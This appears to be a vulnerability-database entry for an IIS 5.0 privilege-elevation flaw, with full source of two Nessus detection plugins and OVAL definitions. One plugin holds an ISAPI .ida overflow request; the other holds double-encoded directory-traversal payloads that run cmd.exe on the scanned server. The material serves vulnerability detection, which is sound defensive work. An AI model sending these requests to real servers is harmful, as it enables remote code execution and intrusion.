Vulnerabilities > CVE-2001-0507 - Unspecified vulnerability in Microsoft Internet Information Services 5.0

CVSS 7.2 - HIGH
Attack vector
LOCAL
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
local
low complexity
microsoft
nessus
exploit available

Summary

IIS 5.0 uses relative paths to find system files that will run in-process, which allows local users to gain privileges via a Trojan horse file, aka the "System file listing privilege elevation" vulnerability. In practice this is a local issue (hence the CVSS attack vector LOCAL): an attacker who can already place a file where IIS resolves one of those relative paths gets it loaded in-process, i.e. inside the IIS process itself. Note that neither Nessus plugin listed below tests this condition; both probe unrelated remote bugs (the ISAPI .ida overflow and the double-decode directory traversal) whose fixes ship in the same cumulative patch, MS01-044, so a hit from either of them only indicates that the host is missing MS01-044.

Vulnerable Configurations

Part Description Count
Application
Microsoft
1

Exploit-Db

descriptionMicrosoft IIS 5.0 In-Process Table Privelege Elevation Vulnerability. CVE-2001-0507 . Local exploit for windows platform
idEDB-ID:21072
last seen2016-02-02
modified2001-08-15
published2001-08-15
reporterDigital Offense
sourcehttps://www.exploit-db.com/download/21072/
titleMicrosoft IIS 5.0 - In-Process Table Privelege Elevation Vulnerability

Nessus

  • NASL familyWeb Servers
    NASL idIIS_ISAPI_OVERFLOW.NASL
    descriptionThere's a buffer overflow in the remote web server through the ISAPI filter. It is possible to overflow the remote web server and execute commands as user SYSTEM. Additionally, other vulnerabilities exist in the remote web server since it has not been patched.
    last seen2020-06-01
    modified2020-06-02
    plugin id10685
    published2001-06-19
    reporterThis script is Copyright (C) 2001-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/10685
    titleMicrosoft IIS ISAPI Filter Multiple Vulnerabilities (MS01-044)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    # This script was written by Renaud Deraison <[email protected]>
    # It was modified by H D Moore to not crash the server during the test
    #
    # Supersedes MS01-033
    
    
    include("compat.inc");
    
    # Registration branch.  It holds only script_* metadata calls and exits
    # before any request is sent; the probe itself starts after this block.
    if(description)
    {
     script_id(10685);
     script_version ("1.51");
     # CVE-2001-0507 (the local "system file listing" privilege elevation) is
     # listed because its fix ships in the same cumulative patch (MS01-044),
     # not because the probe below exercises it; the probe only tests the
     # .ida/.idq ISAPI overflow.
     script_cve_id( "CVE-2001-0544", "CVE-2001-0545", "CVE-2001-0506", "CVE-2001-0507", "CVE-2001-0508", "CVE-2001-0500");
     script_bugtraq_id(2690, 2880, 3190, 3193, 3194, 3195);
     script_xref(name:"MSFT", value:"MS01-033");
     script_xref(name:"MSFT", value:"MS01-044");
     script_xref(name:"MSKB", value:"294774");
     script_xref(name:"MSKB", value:"297860");
     script_xref(name:"MSKB", value:"298340");
     script_xref(name:"MSKB", value:"300972");
     script_xref(name:"MSKB", value:"301625");
     script_xref(name:"MSKB", value:"304867");
     script_xref(name:"MSKB", value:"305359");
    
     script_name(english:"Microsoft IIS ISAPI Filter Multiple Vulnerabilities (MS01-044)");
    
     script_set_attribute(attribute:"synopsis", value:
    "The remote web server is affected by multiple vulnerabilities." );
     script_set_attribute(attribute:"description", value:
    "There's a buffer overflow in the remote web server through
    the ISAPI filter.
     
    It is possible to overflow the remote web server and execute 
    commands as user SYSTEM.
    
    Additionally, other vulnerabilities exist in the remote web
    server since it has not been patched." );
     script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-033" );
     script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-044" );
     script_set_attribute(attribute:"solution", value:
    "Apply the patches from the bulletins above." );
     # The vector describes the remotely testable overflow (network, no auth,
     # full compromise), not every CVE referenced above; CVE-2001-0507 itself
     # is local.
     script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
     script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
     script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
     script_set_attribute(attribute:"exploit_available", value:"true");
     script_set_attribute(attribute:"exploit_framework_core", value:"true");
     script_set_attribute(attribute:"exploited_by_malware", value:"true");
     script_set_attribute(attribute:"metasploit_name", value:'MS01-033 Microsoft IIS 5.0 IDQ Path Overflow');
     script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
     script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
     script_set_attribute(attribute:"canvas_package", value:'CANVAS');
    
     script_set_attribute(attribute:"plugin_publication_date", value: "2001/06/19");
     script_set_attribute(attribute:"patch_publication_date", value: "2001/06/18");
     script_set_attribute(attribute:"vuln_publication_date", value: "2001/05/06");
     script_cvs_date("Date: 2018/11/15 20:50:25");
    script_set_attribute(attribute:"plugin_type", value:"remote");
    script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:iis");
    script_end_attributes();
    
    
     script_summary(english:"Tests for a remote buffer overflow in IIS");
     # ACT_ATTACK: the probe sends a malformed request to the target.  The
     # header comment says it was tuned not to crash the server, but treat it
     # as intrusive on production hosts.
     script_category(ACT_ATTACK);
     script_family(english:"Web Servers");
     script_copyright(english:"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.");
     # Prerequisite plugins that find and fingerprint the HTTP service.
     script_dependencie("find_service1.nasl", "http_version.nasl", "www_fingerprinting_hmap.nasl");
     script_require_ports("Services/www", 80);
     exit(0);
    }
    
    # The attack starts here
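    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    
    # Probe for the ISAPI .ida/.idq overflow (MS01-033, superseded by MS01-044):
    # an oversized query string handed to idq.dll makes an unpatched server
    # fault, and the fault is visible in the response.
    port = get_http_port(default:80);
    banner = get_http_banner(port: port);
    
    # Only IIS ships idq.dll, so skip other servers.  The original compared
    # against an unset variable (`h`) instead of the banner it had just fetched,
    # so the gate never looked at the real banner; test the fetched one.
    if (isnull(banner) || "IIS" >!< banner)
      exit(0, "The web server on port " + port + " is not IIS.");
    
    # 220 'x' bytes is the length the header comment says was chosen so the
    # test trips the bug without crashing the server.
    w = http_send_recv3(method: "GET", port: port,
      item: "/x.ida?" + crap(length:220, data:"x") + "=x");
    if (isnull(w)) exit(1, "the web server did not answer");
    r = strcat(w[0], w[1], '\r\n', w[2]);
    
    # An unpatched server reports the fault as an NT status code in the reply:
    # 0xc0000005 == STATUS_ACCESS_VIOLATION.
    if ("0xc0000005" >< r)
      security_hole(port);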
    
    
  • NASL familyWeb Servers
    NASL idIIS_DECODE_BUG.NASL
    descriptionWhen IIS receives a user request to run a script, it renders the request in a decoded canonical form, and then performs security checks on the decoded request. A vulnerability results because a second, superfluous decoding pass is performed after the initial security checks are completed. Thus, a specially crafted request could allow an attacker to execute arbitrary commands on the IIS Server.
    last seen2020-06-01
    modified2020-06-02
    plugin id10671
    published2001-05-15
    reporterThis script is Copyright (C) 2001-2018 Matt Moore / H D Moore
    sourcehttps://www.tenable.com/plugins/nessus/10671
    titleMS01-026 / MS01-044: Microsoft IIS Remote Command Execution (uncredentialed check)
    code
    #
    # This script was modified by Matt Moore ([email protected])
    # from the NASL script to test for the UNICODE directory traversal
    # vulnerability, originally written by Renaud Deraison.
    #
    # Then Renaud took Matt's script and used H D Moore modifications
    # to iis_dir_traversal.nasl ;)
    #
    
    # Changes by Tenable:
    # - Touched up description (11/04/10)
    # - Add MSKB script_xref (8/29/17)
    
    include("compat.inc");
    
    # Registration branch: metadata only, exits before any request is sent.
    if (description)
    {
     script_id(10671);
     script_version("1.62");
     script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
    
     # CVE-2001-0333 is the double-decode bug this plugin actually probes.
     # CVE-2001-0507 (local privilege elevation) is listed because MS01-044 is
     # the cumulative patch that fixes both; a hit here does not exercise it.
     script_cve_id("CVE-2001-0333", "CVE-2001-0507");
     script_bugtraq_id(2708, 3193);
     script_xref(name:"MSFT", value:"MS01-026");
     script_xref(name:"MSFT", value:"MS01-044");
     script_xref(name:"MSKB", value:"288855");
     script_xref(name:"MSKB", value:"293826");
     script_xref(name:"MSKB", value:"294370");
     script_xref(name:"MSKB", value:"294774");
     script_xref(name:"MSKB", value:"295534");
     script_xref(name:"MSKB", value:"297860");
     script_xref(name:"MSKB", value:"298340");
     script_xref(name:"MSKB", value:"301625");
     script_xref(name:"MSKB", value:"304867");
     script_xref(name:"MSKB", value:"305359");
    
     script_name(english:"MS01-026 / MS01-044: Microsoft IIS Remote Command Execution (uncredentialed check)");
     script_summary(english:"Determines if arbitrary commands can be executed");
    
     script_set_attribute(attribute:"synopsis", value:"Arbitrary commands can be executed on the remote web server.");
     script_set_attribute(attribute:"description", value:
    "When IIS receives a user request to run a script, it renders the
    request in a decoded canonical form, and then performs security checks
    on the decoded request.  A vulnerability results because a second,
    superfluous decoding pass is performed after the initial security checks
    are completed.  Thus, a specially crafted request could allow an
    attacker to execute arbitrary commands on the IIS Server.");
     script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-026");
     script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-044");
     script_set_attribute(attribute:"solution", value:"Microsoft has released a set of patches for IIS 4.0 and 5.0.");
     # Vector for the remote double-decode bug; CVE-2001-0507 itself is local.
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
    script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
     script_set_attribute(attribute:"canvas_package", value:'CANVAS');
    
     script_set_attribute(attribute:"vuln_publication_date", value:"2001/05/15");
     script_set_attribute(attribute:"patch_publication_date", value:"2001/05/15");
     script_set_attribute(attribute:"plugin_publication_date", value:"2001/05/15");
    
     script_set_attribute(attribute:"plugin_type", value:"remote");
     script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:iis");
     script_end_attributes();
    
    
     # NOTE(review): categorised ACT_GATHER_INFO even though the probe below
     # executes cmd.exe on the target (a read-only `dir c:\`) and attaches the
     # resulting listing to the report.  Not destructive, but it is code
     # execution on the host being scanned.
     script_category(ACT_GATHER_INFO);
     script_copyright(english:"This script is Copyright (C) 2001-2020 Matt Moore / H D Moore");
     script_family(english:"Web Servers");
     # Prerequisite plugins that find and fingerprint the HTTP service.
     script_dependencie("find_service1.nasl", "http_version.nasl", "www_fingerprinting_hmap.nasl");
     script_require_ports("Services/www", 80);
     exit(0);
    }
    
    include("global_settings.inc");
    include("http_func.inc");
    include("http_keepalive.inc");
    
    
    # Locate the web server.  `port` is a script global that check() below
    # reads as well, so its name must stay.
    port = get_http_port(default:80, embedded:TRUE);
    
    # Gate on the banner: the solution text only covers IIS 4.0/5.0, so anything
    # that is not IIS, or that reports IIS 6 through 9, is left alone.
    srv_banner = get_http_banner(port:port);
    if ("IIS" >!< srv_banner) exit(0);
    if (srv_banner =~ "Microsoft-IIS/[6-9]") exit(0);
    
    # Make sure the port is still reachable before the request loop starts.
    if (!get_port_state(port)) exit(0);
    
    
    # Virtual directories that a default IIS 4.0/5.0 install (plus FrontPage,
    # OWA and the Win2K extras noted inline) maps to script-enabled locations.
    # The traversal below is attempted from each of them in turn, "/" last.
    dir[0] = "/scripts/";
    dir[1] = "/msadc/";
    dir[2] = "/iisadmpwd/";
    dir[3] = "/_vti_bin/";		# FP
    dir[4] = "/_mem_bin/";		# FP
    dir[5] = "/exchange/";		# OWA
    dir[6] = "/pbserver/";		# Win2K
    dir[7] = "/rpc/";		# Win2K
    dir[8] = "/cgi-bin/";
    dir[9] = "/";
    
    # Parallel tables, indexed together by the request loop.  Each uni[i] is a
    # double-encoded path separator (or dot) that still looks harmless after the
    # first decode-and-check pass described in the plugin text and only becomes
    # '\' (uni[0..3]) or '.' (uni[4]) on the superfluous second decode; dots[i]
    # is the prefix that turns it into one "..\"-style hop.
    uni[0] = "%255c";  	dots[0] = "..";
    uni[1] = "%%35c";	dots[1] = "..";
    uni[2] = "%%35%63";	dots[2] = "..";
    uni[3] = "%25%35%63";   dots[3] = "..";
    uni[4] = "%252e";	dots[4] = "/.";
    
    
    
    
    # Send one traversal candidate and decide whether cmd.exe ran.
    #
    # req - request path (directory + encoded traversal + the global `cmd`).
    # Returns 1 after reporting the hole, with the request URL and the raw
    # response attached as evidence, when the body carries a `dir` listing
    # marker; returns 0 otherwise.  Exits the whole plugin if the server stops
    # answering.  Reads the script global `port`.
    function check(req)
    {
     local_var resp, marker, hit;
    
     resp = http_keepalive_send_recv(port:port, data:http_get(item:req, port:port));
     if (resp == NULL) exit(0);
    
     # Either the per-entry "<DIR>" tag or the "Directory of C:\" header is
     # enough to show the listing came back.
     hit = 0;
     foreach marker (make_list("<DIR>", "Directory of C"))
     {
      if (marker >< resp) hit = 1;
     }
     if (!hit) return(0);
    
     security_hole(port:port, extra:
       strcat('\n Requesting\n ', build_url(port: port, qs: req), '\n produces :\n\n', resp));
     return(1);
    }
    
    
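    # Command appended after the traversal: a read-only listing of the drive
    # root, which check() recognises by its "<DIR>" / "Directory of C" markers.
    cmd = "/winnt/system32/cmd.exe?/c+dir+c:\\+/OG";
    
    # Build the encoded climb for encoding table entry i: the five dots[i]+uni[i]
    # hops the original check hard-coded, optionally followed by one more dots[i]
    # before cmd.  The trailing-dots form is what the check has always sent
    # first; the bare form is the variation reported on vuln-dev.
    function traversal(i, trailing)
    {
     local_var hop, path;
     path = "";
     for (hop = 0; hop < 5; hop = hop + 1)
       path = string(path, dots[i], uni[i]);
     if (trailing) path = string(path, dots[i]);
     return path;
    }
    
    # Try every directory x encoding combination in table order and stop at
    # the first hit, since check() has already reported it.  Returns 1 on a
    # hit, 0 when nothing matched.
    function probe(trailing)
    {
     local_var d, i, url;
     for (d = 0; dir[d]; d = d + 1)
     {
      for (i = 0; uni[i]; i = i + 1)
      {
       url = string(dir[d], traversal(i:i, trailing:trailing), cmd);
       if (check(req:url)) return(1);
      }
     }
     return(0);
    }
    
    # The two passes were previously copy-pasted loops differing only in the
    # trailing dots[i]; order is preserved: trailing form first, bare form second.
    if (probe(trailing:TRUE)) exit(0);
    if (probe(trailing:FALSE)) exit(0);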
    
    
    

Oval

  • accepted2007-08-02T14:47:16.301-04:00
    classvulnerability
    contributors
    • nameChristine Walzer
      organizationThe MITRE Corporation
    • nameRobert L. Hollis
      organizationThreatGuard, Inc.
    descriptionIIS 5.0 uses relative paths to find system files that will run in-process, which allows local users to gain privileges via a Trojan horse file, aka the "System file listing privilege elevation" vulnerability.
    familywindows
    idoval:org.mitre.oval:def:909
    statusaccepted
    submitted2004-05-04T12:00:00.000-04:00
    titleWindows NT IIS System File Listing Privilege Elevation Vulnerability
    version28
  • accepted2005-02-16T12:00:00.000-04:00
    classvulnerability
    contributors
    • nameChristine Walzer
      organizationThe MITRE Corporation
    • nameChristine Walzer
      organizationThe MITRE Corporation
    descriptionIIS 5.0 uses relative paths to find system files that will run in-process, which allows local users to gain privileges via a Trojan horse file, aka the "System file listing privilege elevation" vulnerability.
    familywindows
    idoval:org.mitre.oval:def:912
    statusaccepted
    submitted2004-05-04T12:00:00.000-04:00
    titleWindows 2000 IIS System File Listing Privilege Elevation Vulnerability
    version66